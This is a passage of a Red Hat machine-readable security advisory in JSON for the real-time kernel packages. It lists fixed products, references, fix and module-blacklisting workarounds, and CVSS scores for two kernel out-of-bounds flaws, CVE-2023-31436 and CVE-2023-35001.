"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-31436"
},
{
"category": "external",
"summary": "RHBZ#2192671",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2192671"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-31436",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-31436"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-31436",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31436"
},
{
"category": "external",
"summary": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3037933448f60f9acb705997eae62013ecb81e0d",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3037933448f60f9acb705997eae62013ecb81e0d"
}
],
"release_date": "2023-04-13T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-03-12T11:49:04+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"category": "workaround",
"details": "To mitigate this issue, prevent the module, sch_qfq from being loaded. Please see https://access.redhat.com/solutions/41278 for information on how to blacklist a kernel module to prevent it from loading automatically.",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "kernel: out-of-bounds write in qfq_change_class function"
},
{
"cve": "CVE-2023-35001",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"discovery_date": "2023-07-06T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2220892"
}
],
"notes": [
{
"category": "description",
"text": "An out-of-bounds (OOB) memory access flaw was found in the Netfilter module in the Linux kernel\u0027s nft_byteorder_eval in net/netfilter/nft_byteorder.c. A bound check failure allows a local attacker with CAP_NET_ADMIN access to cause a local privilege escalation issue due to incorrect data alignment.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: nf_tables: stack-out-of-bounds-read in nft_byteorder_eval()",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploiting this flaw will require the CAP_NET_ADMIN access privilege in any user or network namespace.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-35001"
},
{
"category": "external",
"summary": "RHBZ#2220892",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2220892"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-35001",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-35001"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-35001",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35001"
},
{
"category": "external",
"summary": "https://lore.kernel.org/netfilter-devel/20230705121515.747251-1-cascardo@canonical.com/T/",
"url": "https://lore.kernel.org/netfilter-devel/20230705121515.747251-1-cascardo@canonical.com/T/"
},
{
"category": "external",
"summary": "https://www.openwall.com/lists/oss-security/2023/07/05/3",
"url": "https://www.openwall.com/lists/oss-security/2023/07/05/3"
}
],
"release_date": "2023-07-05T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-03-12T11:49:04+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"category": "workaround",
"details": "To mitigate this issue, it is possible to prevent the affected code from being loaded by blacklisting the kernel netfilter module. \n\nFor instructions relating to how to blacklist a kernel module refer to: https://access.redhat.com/solutions/41278",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
